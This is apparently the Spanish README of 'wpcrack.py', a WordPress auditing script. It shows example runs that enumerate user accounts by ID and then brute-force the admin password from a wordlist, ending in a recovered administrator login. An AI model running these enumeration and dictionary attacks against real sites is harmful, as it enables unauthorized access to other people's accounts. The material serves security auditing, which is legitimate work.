Script para auditar la seguridad de un wordpress. Funcionalidades actuales:
Ejemplo de enumeracion de usuarios con id menor o igual a 10 utilizando peticiones POST:
$ python wpcrack.py --quiet --url http://target/ enumerate -m POST [+] User found (uid: 4): theboss [+] User found (uid: 3): user2 [+] User found (uid: 2): user1 [+] User found (uid: 1): adminEjemplo de ataque de diccionario a la cuenta de admin mostrando tambien las peticiones erroneas:
$ python wpcrack.py --url http://target/ bruteforce -u admin -w dict.txt [-] The password '1234admin' doesn't match [-] The password '1234password' doesn't match [-] The password 'password' doesn't match [-] The password 'pass1234' doesn't match [-] The password 'adminstrator' doesn't match [-] The password '123456' doesn't match [-] The password '1234' doesn't match [+] Username: admin [+] Password: admin [+] Profile : administrator
Agradecimientos por sus sugerencias a J. M. Fernandez, @TheXC3LL